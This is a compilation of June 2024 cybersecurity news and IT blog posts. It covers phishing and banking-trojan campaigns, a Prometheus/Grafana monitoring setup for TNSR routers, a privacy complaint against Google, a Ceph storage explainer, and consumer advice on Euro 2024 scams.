Saturday, June 15, 2024

Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S.

"The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is to steal their personal and financial information."

The threat actors, believed to be Chinese-speaking, are known to leverage stolen databases sold on the dark web to send bogus SMS messages, enticing recipients into clicking on links under the pretext of informing them of a failed package delivery and urging them to update their address.

Users who end up clicking on the URLs are directed to fake websites that prompt them to enter their financial information as part of a supposed service fee charged for redelivery.

"Besides Pakistan Post, the group was also involved in detecting multiple fake delivery package scams," Resecurity said. "These scams primarily targeted individuals who were expecting legitimate packages from reputable courier services such as TCS, Leopard, and FedEx."

The development comes as Google revealed details of a threat actor it calls PINEAPPLE that employs tax and finance-themed lures in spam messages to entice Brazilian users into opening malicious links or files that ultimately lead to the deployment of the Astaroth (aka Guildma) information-stealing malware.

"PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil," Google's Mandiant and Threat Analysis Group (TAG) said. "The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others."

It's worth noting that the abuse of Google Cloud Run to disseminate Astaroth was flagged by Cisco Talos this February, which described it as a high-volume malware distribution campaign targeting users across Latin America (LATAM) and Europe.

The internet goliath said it also observed a Brazil-based threat cluster it tracks as UNC5176 targeting financial services, healthcare, retail, and hospitality sectors with a backdoor codenamed URSA that can siphon login credentials for various banks, cryptocurrency websites, and email clients.

The attacks leverage emails and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a Visual Basic Script (VBS) responsible for contacting a remote server and fetching a second-stage VBS file.

The downloaded VBS file subsequently proceeds to carry out a series of anti-sandbox and anti-VM checks, after which it initiates communications with a command-and-control (C2) server to retrieve and execute the URSA payload.

A third Latin America-based financially motivated actor spotlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking trojan. The company said it took down phishing pages hosted by the adversary in 2023 on Google Cloud that impersonated Mercado Pago with the goal of stealing users' credentials.

"More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware," it said.

The disclosure follows the emergence of a new threat actor dubbed Red Akodon that has been spotted propagating various remote access trojans like AsyncRAT, Quasar RAT, Remcos RAT, and XWorm through phishing messages that are designed to harvest bank account details, email accounts, and other credentials.

Targets of the campaign, which has been ongoing since April 2024, include government, health, and education organizations as well as financial, manufacturing, food, services, and transportation industries in Colombia.

"Red Akodon's initial access vector occurs mainly using phishing emails, which are used as a pretext for alleged lawsuits and judicial summonses, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and Juzgado 06 civil del circuito de Bogotá," Mexican cybersecurity firm Scitum said.


from The Hacker News

Friday, June 14, 2024

TNSR Prometheus Exporter with A Grafana Dashboard Visualization


Prometheus is a powerful and flexible toolkit for monitoring and alerting, designed to handle modern, highly dynamic environments easily. Its ability to efficiently collect, store, and query time-series data and robust alerting and visualization capabilities make it a popular choice for infrastructure and application monitoring. Its extensibility and integration with other tools like Grafana further enhance its utility in diverse monitoring scenarios. Prometheus is not a direct successor to SNMP but an addition that brings powerful capabilities for modern monitoring needs. 


Prometheus is widely used across various industries due to its flexibility, scalability, and powerful capabilities in monitoring and alerting. TNSR customers that require real-time insights into their network infrastructure, need to ensure high availability, and want to automate their incident response processes typically benefit the most from Prometheus. Its ability to integrate with modern cloud-native environments and its extensive ecosystem make it a critical tool for DevOps, SRE (Site Reliability Engineering), and IT operations teams.

How It Works

  • The Prometheus Exporter needs to be enabled on TNSR by following this procedure. TNSR includes a Prometheus exporter which supports statistical data from the dataplane (VPP) only. Once enabled, the service listens for connections on TCP port 9482, and the metrics can be accessed at http://<IP address>:9482/metrics.
  • The Prometheus server (running separately on a dedicated server) queries metrics and stores them in the database.
  • The Grafana server uses the Prometheus database as a data source. This involves specifying the URL of the Prometheus server in Grafana.
  • Users create dashboards in Grafana, adding panels and using PromQL queries to fetch data from Prometheus, or download ready-to-use dashboards from the Grafana website, such as this dashboard.

Deployment Guide

High-level Steps

  • Enable Prometheus on TNSR
  • Install and configure Prometheus on the Ubuntu server
  • Install and configure Grafana on the Ubuntu server
  • Grafana Dashboard

In this deployment scenario, we are going to use a single server for Prometheus and Grafana, but it is recommended to have dedicated servers in production. Prometheus and Grafana will be installed on an Ubuntu server. Please refer to the Prometheus and Grafana documentation to see what options are available.

Enable Prometheus on TNSR

For a detailed explanation and possible configuration options, please refer to the Netgate documentation here. To enable Prometheus on TNSR, you only need to run a single command:

ubuntu$ prometheus host enable

Apply filters if required. For example, to filter only interfaces data you can run:

ubuntu$ prometheus host filter interfaces

Applying filters may be helpful if you have a busy configuration on TNSR, especially if you are running BGP with the full internet table. This may generate a large amount of traffic to your Prometheus server.

Install and Configure Prometheus on the Ubuntu Server

There are multiple ways to install Prometheus; we followed this article

  • Create a System User for Prometheus

ubuntu$ sudo groupadd --system prometheus

ubuntu$ sudo useradd -s /sbin/nologin --system -g prometheus prometheus

  • Create Directories for Prometheus

ubuntu$ sudo mkdir /etc/prometheus

ubuntu$ sudo mkdir /var/lib/prometheus

  • Download Prometheus and Extract Files

To download the latest update, go to the Prometheus Official Downloads site and copy the download link.

ubuntu$ wget

ubuntu$ tar vxf prometheus*.tar.gz

  • Navigate to the Prometheus Directory

ubuntu$ cd prometheus*/

  • Move the Binary Files & Set Owner

ubuntu$ sudo mv prometheus /usr/local/bin

ubuntu$ sudo mv promtool /usr/local/bin

ubuntu$ sudo chown prometheus:prometheus /usr/local/bin/prometheus

ubuntu$ sudo chown prometheus:prometheus /usr/local/bin/promtool

  • Move the Configuration Files & Set Owner

ubuntu$ sudo mv consoles /etc/prometheus

ubuntu$ sudo mv console_libraries /etc/prometheus

ubuntu$ sudo mv prometheus.yml /etc/prometheus

ubuntu$ sudo chown prometheus:prometheus /etc/prometheus

ubuntu$ sudo chown -R prometheus:prometheus /etc/prometheus/consoles

ubuntu$ sudo chown -R prometheus:prometheus /etc/prometheus/console_libraries

ubuntu$ sudo chown -R prometheus:prometheus /var/lib/prometheus

Update target IP address in prometheus configuration file:

ubuntu$ sudo nano /etc/prometheus/prometheus.yml

  • Create Prometheus Systemd Service

Now, you need to create a system service file for Prometheus. Create and open a prometheus.service file with the Nano text editor using:

ubuntu$ sudo nano /etc/systemd/system/prometheus.service

Add these settings to the file, save, and exit. The User, Group and paths match the system user and directories created above; the [Unit] and [Install] sections are the standard layout for a systemd service:

[Unit]
Description=Prometheus
Wants=network-online.target
After=network-online.target

[Service]
User=prometheus
Group=prometheus
Type=simple
ExecStart=/usr/local/bin/prometheus \
    --config.file /etc/prometheus/prometheus.yml \
    --storage.tsdb.path /var/lib/prometheus/ \
    --web.console.templates=/etc/prometheus/consoles \
    --web.console.libraries=/etc/prometheus/console_libraries

[Install]
WantedBy=multi-user.target

Reload systemd so that it picks up the new unit:

ubuntu$ sudo systemctl daemon-reload

  • Start Prometheus Service and check status

ubuntu$ sudo systemctl enable prometheus

ubuntu$ sudo systemctl start prometheus

ubuntu$ sudo systemctl status prometheus

Now you should have your Prometheus server up and running. You can access it via http://<server-ip>:9090/

To verify that Prometheus can successfully pull metrics from TNSR, please go to Status > Targets. You should see your TNSR in the Endpoint column with the Green Status UP.

Install and Configure Grafana on the Ubuntu Server

For the Grafana installation, we used this procedure.

  • Install the prerequisite packages:

ubuntu$ sudo apt-get install -y apt-transport-https software-properties-common wget

ubuntu$ sudo mkdir -p /etc/apt/keyrings/

ubuntu$ wget -q -O - | gpg --dearmor | sudo tee /etc/apt/keyrings/grafana.gpg > /dev/null

  • To add a repository for stable releases, run the following command:

ubuntu$ echo "deb [signed-by=/etc/apt/keyrings/grafana.gpg] stable main" | sudo tee -a /etc/apt/sources.list.d/grafana.list

  • Run the following command to update the list of available packages:

# Updates the list of available packages

ubuntu$ sudo apt-get update

  • To install Grafana OSS, run the following command:

# Installs the latest OSS release:

ubuntu$ sudo apt-get install grafana

After the above steps your Grafana server should be accessible on http://<server-ip>:3000/ using default username and password admin/admin. It is recommended to update your password after first login.

Once in the Grafana Home Page please follow Connections > Data Source and type “Prometheus” in the search field to add your first Data Source, in our case - Prometheus Server. 

Type the name for your Data Source and http://localhost:9090 in the Connections URL field. This should be enough for your Data Source configuration. 

Scroll down and click Save & Exit. You should see the below message that Grafana has successfully queried the Prometheus API.

Grafana Dashboard

The next step is to create your Dashboard. For this, you need to go to the Dashboard menu where you will have a couple of options. You can create it manually or import a dashboard pre-built by the community.

Pre-built Grafana Dashboards can be found on the Grafana website:

We recommend using this VPP Dashboard. You can download it and import it by clicking the Import button in the Dashboard menu. Please note that this Dashboard requires VPP 24.02, which is available in TNSR Release 24.06. Although the Dashboard will work with an older version, some graphs that require VPP 24.02 won't be displayed correctly. This is how the VPP Performance Details Dashboard panel looks once installed. It can be accessed under Dashboards.

At the top of the dashboard, you will find a list of your instances and interfaces which you can browse.

By selecting a specific interface, you will see graphs only for that interface.


Using Prometheus on a TNSR router enhances network monitoring by providing detailed, scalable, and customizable metrics collection and analysis. The integration with Grafana further enriches the monitoring experience through advanced visualization capabilities. This combination allows network administrators to gain deep insights, proactively manage network health, and efficiently respond to potential issues, while benefiting from open-source tools' flexibility and extensibility.

from Blog

Google's Privacy Sandbox Accused of User Tracking by Austrian Non-Profit

Jun 14, 2024 | Newsroom | Privacy / Ad Tracking

Google's plans to deprecate third-party tracking cookies in its Chrome web browser with Privacy Sandbox have run into fresh trouble after the Austrian privacy non-profit noyb (none of your business) said the feature can still be used to track users.

"While the so-called 'Privacy Sandbox' is advertised as an improvement over extremely invasive third-party tracking, the tracking is now simply done within the browser by Google itself," noyb said.

"To do this, the company theoretically needs the same informed consent from users. Instead, Google is tricking people by pretending to 'Turn on an ad privacy feature.'"

In other words, by making users agree to enable a privacy feature, they are still being tracked by consenting to Google's first-party ad tracking, the Vienna-based non-profit founded by activist Max Schrems alleged in a complaint filed with the Austrian data protection authority.

Privacy Sandbox is a set of proposals put forth by the internet giant that aims to block covert tracking techniques and limit data sharing with third-parties while allowing website publishers to serve tailored ads.

However, its plans to deprecate third-party cookies in Chrome have been repeatedly delayed as it works towards addressing concerns and feedback raised by regulators and developers. Back in April, the company said it intends to phase out third-party cookies early next year.

In the interim, Google is ramping up testing efforts, with the company already deprecating third-party cookies for 1% of Chrome users globally starting the first quarter of 2024.

While users have the option to accept or decline tracking in this manner, noyb has accused the company of using dark patterns to increase consent rates and of misleadingly passing the setting off as a feature that protects users from ad tracking.

Noyb further argued that Privacy Sandbox being less invasive than third-party cookie tracking mechanisms does not give Google the right to violate data protection laws in the region.

"Consent has to be informed, transparent, and fair to be legal. Google has done the exact opposite," noyb's founder Max Schrems said. "If you merely steal less money from people than another thief, you can't call yourself a 'wealth protection agent.' But that is basically what Google is doing here."

Google, in a statement shared with Reuters, said Privacy Sandbox offers "meaningful privacy improvement" over existing technologies, and that it will work towards arriving at a "balanced outcome" that meets the needs of all stakeholders.

This is not the first time Noyb has filed complaints with the European Union watchdogs against big tech companies for alleged privacy infringements.

Earlier this April, it accused ChatGPT maker OpenAI of violating General Data Protection Regulation (GDPR) laws by "hallucinating" false information about individuals.

It has also criticized Meta for relying on "Legitimate Interests" over its plans to utilize publicly shared data of its users -- with the exception of private messages with friends and family or from accounts of Europeans under age 18 -- to train and develop unspecified artificial intelligence technologies.

The social media company has since responded stating the AI models it develops "need to be trained on relevant information that reflects the diverse languages, geography, and cultural references of the people in Europe who will use them."

It further said other companies including Google and OpenAI have already used data from European users to train their AI models, noting its approach is "more transparent and offers easier controls than many of our industry counterparts already training their models on similar publicly available information."


from The Hacker News

What is Ceph and Ceph Storage?

As data storage demands grow exponentially, finding scalable and resilient storage solutions becomes crucial. Enterprises require robust systems that can manage vast amounts of data efficiently while ensuring high availability and reliability. Enter Ceph: a standout contender in the world of distributed storage systems, known for its impressive scalability.

What is Ceph?

Ceph is an open-source software-defined storage solution designed to provide block, file, and object storage access from a single system. It's built to be self-healing and self-managing, which aims to reduce the cost and complexity of maintaining the storage infrastructure. Ceph software can run on most commodity hardware, while its distributed architecture is highly scalable, up to the exabyte level.

Ceph was created by Sage Weil during his doctoral research at the University of California, Santa Cruz. The project started in 2004, and by 2006, Ceph was already available under an open-source license.

Figure 1: Ceph architecture

How Does Ceph Work?

Though Ceph can be configured to run from a single server, that is not how it is meant to be used. For a feasible production-ready deployment, Ceph requires a minimum of 3 servers connected to one another in what is called a cluster. Each connected server within that cluster network is referred to as a node.

Ceph Components

Ceph uses a distributed architecture with five key components (daemons), which can all run on the same set of cluster nodes, and which all have their distinct roles. This design allows for direct interaction with these components, creating a flexible and resilient storage architecture. The key daemons in a Ceph cluster are:

Ceph monitors (ceph-mon): Monitor the status of individual nodes in the cluster, including the managers (MGR), object storage devices (OSD), and metadata servers (MDS). To ensure maximum reliability, it is recommended to have at least 3 monitor nodes.

Ceph managers (ceph-mgr): Manage the status of storage usage, system load, and node capacity. Running alongside the monitor daemons, managers also provide additional monitoring capabilities and interfaces for external management systems.

Metadata servers (ceph-mds): Store metadata, including storage paths, file names, and timestamps of files for its CephFS filesystem.

Object storage devices (ceph-osd): Manage actual data, handling data storage, replication and restoration. A minimum of 3 OSDs is recommended for a production cluster.

RESTful gateways (ceph-rgw): Expose the object storage layer as an HTTP interface compatible with the Amazon S3 and OpenStack Swift REST APIs.

Ceph Storage Operating Principles

Ceph distributes data across multiple nodes using the CRUSH (Controlled Replication Under Scalable Hashing) algorithm, which manages data replication and placement within the cluster. Here’s how it works:

Data placement and replication: CRUSH distributes files in a pseudo-random manner: it first selects the optimal storage locations based on predefined criteria, and then files are duplicated and stored on physically separate media according to the replication parameters specified by the system administrator. Files are organized into placement groups (PGs), and their names are processed as hash values.

Data retrieval: To read data, Ceph uses an allocation table called the CRUSH Map to locate an OSD containing the requested file.

Self-healing: If a node fails, Ceph automatically redistributes the data to other healthy nodes and restores the initial number of data copies.

Such an approach ensures that Ceph can handle large amounts of data while providing high availability and performance.
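The three principles above (hash-based placement into PGs, replicas on separate failure domains, and redistribution when a node fails) can be seen in a small simulation. The following Python is an added example written for this page, not Ceph's CRUSH implementation: the cluster map, the 64-PG pool, the `_straw` hash and the `place_pg` selection rule are all constructed simplifications, and the OSD and host names are placeholders.

```python
import hashlib
from collections import Counter

# Constructed toy cluster map (OSD id -> host). A simplified model for this
# example, not Ceph's real CRUSH map or CRUSH algorithm.
CLUSTER_MAP = {
    0: "host-a", 1: "host-a",
    2: "host-b", 3: "host-b",
    4: "host-c", 5: "host-c",
    6: "host-d", 7: "host-d",
}
PG_NUM = 64        # placement groups in the pool
REPLICA_SIZE = 3   # copies kept of every object


def _straw(*parts) -> int:
    """Deterministic pseudo-random draw from the inputs (stand-in for CRUSH's hash)."""
    seed = "|".join(str(p) for p in parts).encode()
    return int.from_bytes(hashlib.sha256(seed).digest()[:8], "big")


def object_to_pg(name: str, pg_num: int = PG_NUM) -> int:
    """Objects land in a placement group by hashing their name."""
    return _straw("obj", name) % pg_num


def place_pg(pg: int, cluster_map: dict, size: int = REPLICA_SIZE,
             down: frozenset = frozenset()) -> list:
    """Choose `size` OSDs for a PG, one replica per round: every live OSD on a
    host not yet used draws a straw seeded by (pg, round, osd) and the longest
    wins. Straws do not depend on which OSDs are down, so losing one OSD only
    moves the PGs that were actually stored on it."""
    chosen, used_hosts = [], set()
    for rnd in range(size):
        best, best_straw = None, -1
        for osd, host in cluster_map.items():
            if osd in down or host in used_hosts:
                continue
            straw = _straw("pg", pg, rnd, osd)
            if straw > best_straw:
                best, best_straw = osd, straw
        if best is None:
            break                 # not enough hosts left for another replica
        chosen.append(best)
        used_hosts.add(cluster_map[best])
    return chosen


def locate(name: str, cluster_map: dict = CLUSTER_MAP,
           down: frozenset = frozenset()) -> list:
    """Retrieval: the client computes the PG and its OSDs itself; index 0 is the primary."""
    return place_pg(object_to_pg(name), cluster_map, down=down)


def remap_after_failure(cluster_map: dict, down: frozenset,
                        pg_num: int = PG_NUM) -> dict:
    """Self-healing view: compare placements with and without the failed OSDs and
    report how many PGs move and where the replacement copies go."""
    moved, new_homes = 0, Counter()
    for pg in range(pg_num):
        before = place_pg(pg, cluster_map)
        after = place_pg(pg, cluster_map, down=down)
        if before != after:
            moved += 1
            for osd in set(after) - set(before):
                new_homes[osd] += 1
    return {"pgs_moved": moved, "new_copies_per_osd": dict(new_homes)}


if __name__ == "__main__":
    print("object 'vm-disk-01' lives on OSDs", locate("vm-disk-01"))
    print("after losing osd.3:", remap_after_failure(CLUSTER_MAP, frozenset({3})))
```

Two properties worth noticing when you run it: every PG ends up on three different hosts, so a single host loss never removes all copies, and marking an OSD down changes only the PGs that had a copy on it, which is what keeps recovery traffic proportional to the data actually lost rather than to the whole pool.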

Ceph Storage Types and Protocols

Ceph supports various storage types, making it a versatile solution for different storage needs. The primary storage types include:

Object Storage

Ceph provides object storage through its RADOS (Reliable Autonomic Distributed Object Store) layer. RADOS is a scalable object store that handles data storage, retrieval, and replication across the cluster. It allows applications to interact with data using RESTful APIs, such as S3 and SWIFT.

Block Storage

Ceph’s RADOS Block Device (RBD) provides block storage access, enabling the creation of virtual disk images that can be attached to virtual machines. This makes Ceph suitable for cloud and virtualization environments where scalable and resilient block storage is required.

File Storage

Ceph also offers file storage through CephFS, which provides a POSIX-compliant file system. CephFS allows users to store and retrieve files hierarchically, similar to traditional file systems, but with the added benefits of Ceph’s distributed architecture.

Benefits and Challenges of Ceph


Ceph offers numerous benefits, making it a preferred choice for many organizations:

Free software: Ceph is a free and open-source platform with extensive online resources available for setup and maintenance. Red Hat's acquisition of Ceph ensures its continued development in the foreseeable future.

Enormous scalability: Ceph scales to exabyte levels, meeting even the largest storage capacity demands.

Self-healing: When properly configured and maintained, Ceph provides excellent data protection and self-healing capabilities ensuring data integrity and continuous availability.


However, implementing Ceph comes with its own set of challenges:

Complexity: Setting up a proper Ceph cluster and maintaining it effectively involves a steep learning curve that can be overwhelming even for skilled IT administrators without the relevant experience.

Limited performance: Ceph is sort of a “one-trick pony” in terms of storage performance. It deals perfectly with objects and large sequential data blocks (64K and more) but falls behind other competitive solutions when it comes to small-sized random or mixed workloads (4K, 8K) that are common in most virtualization use cases. Additionally, optimizing Ceph for specific workloads requires extensive performance tuning and experience.

Resource intensive: Ceph is designed for large deployments and truly begins to shine with 4, preferably 5 nodes, which is not ideal for small and medium-sized businesses. This can be somewhat mitigated with all-NVMe configurations, making a 3-node cluster a feasible option.

Ceph vs. StarWind Virtual SAN

In the world of data storage, choosing the right solution can make all the difference. Ceph and StarWind Virtual SAN (VSAN) are two prominent contenders, each with unique strengths and capabilities. When comparing Ceph with StarWind Virtual SAN (VSAN), several distinctions become evident:

Feature | Ceph | StarWind VSAN
--- | --- | ---
Storage Types | Object, Block, File | Block, File
Scalability | High | Moderate
Hardware footprint | High (3 nodes minimum, 4 or more nodes recommended, depends on storage type) | Low (2 nodes minimum for a production-ready highly-available (HA) configuration)
Licensing | Open source, with optional paid support | Commercial; a free version with limited support is available
Ease of Setup | Complex | Easy to set up; installation assistance service is included in the price
Performance | Moderate (varies by workload) | High (higher performance in most virtualization use cases)

While Ceph provides a versatile and scalable solution, StarWind VSAN offers much more impressive performance, particularly for virtual machine storage use cases. For a detailed comparison of these and other prominent solutions, refer to the “DRBD/LINSTOR vs Ceph vs StarWind VSAN: Proxmox HCI Performance Comparison” article.


What does Ceph stand for?

Ceph stands for “Cephalopod,” inspired by intelligent marine animals known for their distributed nervous system, reflecting Ceph’s distributed architecture.

What is the function of Ceph?

Ceph decouples data from physical storage hardware through software abstraction layers, providing impressive scalability and fault management. This makes Ceph great for large private cloud environments, OpenStack, Kubernetes, and other container-based workloads.

What is the difference between NFS and Ceph?

NFS (Network File System) is a protocol that allows file access over a network, typically used for simple file sharing. Ceph, on the other hand, offers a more comprehensive and scalable storage solution with support for high availability, object, block, and file storage, making it suitable for more demanding and diverse storage needs. You can use CephFS namespaces with the NFS-Ganesha server to export them over the NFS protocol. This allows you to run multiple NFS instances with RADOS Gateway (RGW), exporting the same or different resources from the Ceph cluster. This way, you get the ease of NFS with the strength and scalability of Ceph.

from StarWind Blog

The Good, the Bad and the Ugly in Cybersecurity – Week 24

The Good | Ukrainian Police Arrest Cryptor Specialist Helping Conti & LockBit Ransomware Operations

A Russian national was arrested this week for allegedly working with Conti and LockBit ransomware groups, helping to make their malware undetectable and also conducting at least one attack himself. Ukrainian cyber police apprehended the 28-year-old man in Kyiv during Operation Endgame, a major operation carried out two weeks ago to dismantle an extensive ecosystem of malware droppers.

(Source: Cyber Police of Ukraine)

According to Ukrainian law enforcement, the arrested man had expertise in developing custom crypters that encrypted and obfuscated ransomware payloads into what looked like innocuous files. This made them fully undetectable (FUD) to legacy antivirus software. His services were sold to both the Conti and LockBit syndicates, which bolstered their success rates in infiltrating networks.

Reports from Dutch police confirm that the man orchestrated at least one of his own attacks using a Conti payload in 2021, indicating his involvement as an affiliate and goals to gain maximum profits from the relationship. His arrest includes seizure of computer equipment, mobile phones, and handwritten notes, all being held for ongoing examination. As it stands, the Russian suspect has already been charged under Part 5 of Article 361 of the Criminal Code of Ukraine for unauthorized interference with information systems. He faces up to 15 years in prison.

This arrest is the latest in a string of actions against LockBit operations, most recently following the distribution of 7000 decryption keys to all affected victims of the Ransomware-as-a-Service (RaaS). Earlier last month, the DoJ unveiled the identity of LockBit’s developer, placing a reward up to $10 million for his arrest or conviction.

The Bad | Hamas-Linked Threat Group Spies on Android Users In Egypt & Palestine

An espionage-focused threat actor known as Arid Viper has been linked to an ongoing mobile-based campaign, involving trojanized Android apps delivering ‘AridSpy’ spyware. Based on a recent report, the Hamas-aligned actor is distributing malware through websites that mimic legitimate messaging, job search, and civil registry applications.

Arid Viper’s latest appearance is marked by a new version of AridSpy – a multi-stage trojan capable of downloading additional payloads from a command-and-control (C2) server. The attacks are primarily targeting users in Palestine and Egypt through websites that distribute the fake (but functional) apps. The apps themselves are clones of legitimate services, but with malicious features.

(Source: WeLiveSecurity)

In one case, researchers found a website impersonating a Palestinian Civil Registry which had a nearly 200-person following on its dedicated Facebook page. While the app on this site is not a direct clone of the legitimate version found on Google Play Store, it communicates with its legitimate server, indicating a high level of sophistication by Arid Viper.

The actor is also responsible for registering a fake job opportunity app which, upon install, downloads a first-stage payload posing as a Google Play Services update. The spyware then executes various commands, including taking pictures with the front camera when specific conditions are met and sending the data to the actor’s C2 server.

Arid Viper continues to cause concern due to its consistent use and development of mobile spyware to target military personnel in the Middle East as well as journalists and political dissidents. Organizations in critical infrastructures guarding high-value intel can mitigate the threat of cyber espionage by implementing proactive and AI-enhanced threat detection, advanced response capabilities, and deep visibility across networks.

The Ugly | Multi-Platform Malware Campaign Targets Indian Critical Sectors via RATs

Cyber researchers have uncovered a six-year-long threat campaign, dubbed ‘Operation Celestial Force’, that employs a combination of GravityRAT, an Android-based malware, and HeavyLift, a Windows-based malware loader. Their report ties Pakistani threat group Cosmic Leopard (aka SpaceCobra) to the campaign with high confidence.

Most recent activity in the operation shows a defined expansion and evolution in the malware suite being used, suggesting ongoing success of the campaign in targeting users in the Indian subcontinent. The operation leverages both GravityRAT and HeavyLift, which are simultaneously managed through another standalone tool called 'GravityAdmin'.

Though GravityRAT was originally a Windows-based malware deployed via spear phishing emails, it has since been adapted for Android systems as well. The Android version of the tool has now been observed in attacks against the Indian military and Pakistani Air Force personnel by masquerading as cloud storage, entertainment, and chat apps. The HeavyLift malware loader is shipped as an Electron app and targets Windows, macOS and Linux.

HeavyLift code targeting macOS

Cosmic Leopard commonly uses spear phishing and social engineering tactics to gain the trust of their victims. After being directed to visit malicious sites, victims are lured into downloading benign-looking programs that then deploy either GravityRAT or HeavyLift depending on the OS in question. The GravityAdmin binary has been used to control the compromised systems since at least August 2021 and works by managing connections with GravityRAT and HeavyLift’s C2 servers.

Researchers posit that the long-running operation will continue to harvest sensitive information from users in the Indian defense, government, and technology sectors, making it crucial for these organizations to shore up their data encryption, real-time monitoring, and automated response capabilities.

from SentinelOne

Euro 2024: Common cyberthreats | Kaspersky official blog

Fraudsters love hype and all-things-trending. Ah, so Toncoin is becoming very popular? Let’s build a cryptocurrency pyramid scheme. Artificial intelligence has hit the next level? Perfect for making voice deepfakes. The Euros have started? Get ready for a month of soccer scams…

The UEFA Euro 2024 tournament will gather over 2.7 million people in stadiums, and another 12 million in fan zones across Germany, while the total number of folks who’ll be following the year’s biggest soccer tournament boggles the mind. Alas, many of these spectators and viewers could make easy targets for scammers. That’s why it’s important to take the right precautions, understand the potential cyberthreats in the soccer world, and learn how to watch your favorite team’s matches safely.

Fake tickets

A typical threat before any major offline event is ticket fraud. In short: buy tickets only from the official UEFA website, or at the stadium box office – not from third parties or any other websites.

What could go wrong otherwise? Here are a few common scenarios:

  • Payment data compromise. This can happen if you pay by card on a fake (phishing) website. So before attempting to buy a ticket online, make sure there are no typos in the website’s address and that the domain wasn’t registered just a couple of weeks ago.
  • Personal data compromise. This scenario is also possible when buying from a phishing site — fraudsters may ask for not just your bank details but also your name, address, phone number and email. Be cautious if buying tickets requires an unusual amount of personal data.
  • Malware downloads. Fraudsters may offer to sell Euro 2024 tickets via a “special app”. This seemingly harmless app could turn out to be a stealer, miner, or something even worse. If you come across an offer to “download this app to buy tickets”, ignore it — it’s a scam.

All these scenarios have the same potential outcome — no tickets actually purchased, financial loss, and a very grumpy mood. If you want to make sure your data hasn’t already been compromised, install Kaspersky Premium — it will protect your devices from viruses, keep you safe from phishing and malicious links while surfing the web, and automatically check for data leaks from your accounts tied to email and phone numbers.

Pirate streams

Even if you plan on watching the entire tournament online — remain vigilant. Some attractively priced streaming services may turn out to be pirated, and a subscription that seems like a great deal could empty your bank account.

The risks here are the same as with tickets — payment and personal data can be stolen, and malicious scripts can be embedded in the streaming site pages, allowing attackers to control your browser and system. That’s why we don’t recommend storing passwords in your browser — use a password manager.

Pirate streaming service for watching Euro Cup matches

Illegal betting

Another popular type of soccer fraud is betting with illegal, fraudulent bookmakers offering fantastic odds. These outfits lure gamblers with attractive odds, and then disappear within a couple of weeks. As a result, the fans lose their money and, yet again, their payment data ends up in grubby hands. If you want to place a bet on a soccer match, use the official website or app of a bookmaker licensed to operate in your country.

Fake stores

Any soccer tournament involving national teams inevitably causes a surge in the popularity of stores selling fan merchandise: jerseys, scarves, T-shirts and so on. Among the plethora of such shops, it’s best to choose official or offline stores — that way you won’t get scammed.

Fake store selling soccer paraphernalia

Fraudsters attract buyers with big discounts, low prices and free shipping, but in reality, these are classic scammer scenarios: without reliable protection, your payment and personal data can be stolen and you’ll never receive your favorite team’s jersey.


  • Watch soccer matches only on official channels/sites and don’t pay distributors of pirated content.
  • Use reliable protection that warns you when you’re about to visit a phishing site.
  • Pay using a virtual card with a set limit. Before purchasing a ticket or subscription, transfer only the amount needed for that one transaction. This way, fraudsters won’t be able to get their hands on anything extra.
  • Don’t buy tickets on the second-hand market— such tickets may be invalidated by UEFA. It’s better to use the organization’s official website.
  • Buy fan merchandise only from official stores— otherwise you risk encountering fraudsters.

from Kaspersky official blog

Learn to Secure Petabyte-Scale Data in a Webinar with Industry Titans

Jun 14, 2024 | The Hacker News

Data is growing faster than ever. Remember when petabytes (that's 1,000,000 gigabytes!) were only for tech giants? Well, that's so last decade! Today, businesses of all sizes are swimming in petabytes.

But this isn't just about storage anymore. This data is ALIVE—it's constantly accessed, analyzed, shared, and even used to train the next wave of AI.

This creates a huge challenge: how do you secure such a vast, ever-changing landscape?

That's why we've brought together a powerhouse panel of industry experts who have not only faced these challenges but conquered them.

Join us for an exclusive webinar, "Data Security at the Petabyte Scale," and gain insights from the best in the field:

  • Shaun Marion: Former CISO of McDonald's, a global brand with data security demands on a massive scale.
  • Robert Bigman: Former CISO at the CIA, where protecting classified information at the highest levels is paramount.
  • Asaf Kochan: Former head of Unit 8200 (Israel's elite cyber intelligence unit) and Co-Founder and President of Sentra, a leading data security platform.
  • Swathi Joshi: VP, SaaS Cloud Security at Oracle, a veteran in safeguarding data across diverse cloud environments.

In this must-attend webinar, you'll learn:

  • How to adapt your data security strategies to keep pace with explosive data growth
  • Best practices for managing access control and monitoring in petabyte-scale environments
  • Strategies for mitigating risks associated with third-party data access and data movement
  • Insights into the unique security challenges posed by LLM model training
  • Future-proofing your data security approach for the era of big data

Whether you're a CISO, security engineer, IT professional, or business leader, if you're responsible for protecting your company's data, this webinar is essential. Secure your place in this exclusive webinar and be part of the future of data security.


from The Hacker News

Why Regulated Industries are Turning to Military-Grade Cyber Defenses

Jun 14, 2024 | The Hacker News | Cybersecurity / Regulatory Compliance

As cyber threats loom large and data breaches continue to pose increasingly significant risks, organizations and industries that handle sensitive information and valuable assets become prime targets for cybercriminals seeking financial gain or strategic advantage.

That is why many highly regulated sectors, from finance to utilities, are turning to military-grade cyber defenses to safeguard their operations.

Regulatory Pressures Impacting Cyber Decisions

Industries such as finance, healthcare, and government are subject to strict regulatory standards, governing data privacy, security, and compliance. Non-compliance with these regulations can result in severe penalties, legal repercussions, and damage to reputation. To meet regulatory requirements and mitigate the ever-increasing risk, organizations are shifting to adopt more robust cybersecurity measures.

Understanding the Increase of Threats

Attacks on regulated industries have increased dramatically over the past 5 years, with organizations being bombarded with constant threats daily. Military cyber defenses leverage threat intelligence capabilities to identify and neutralize cyber threats effectively. By harnessing real-time data analytics, machine learning algorithms, and predictive modeling, these defenses don't just detect anomalies; they prevent potential breaches before they occur. Regulated industries are increasingly investing in similar technologies to enhance their threat protection and response capabilities.

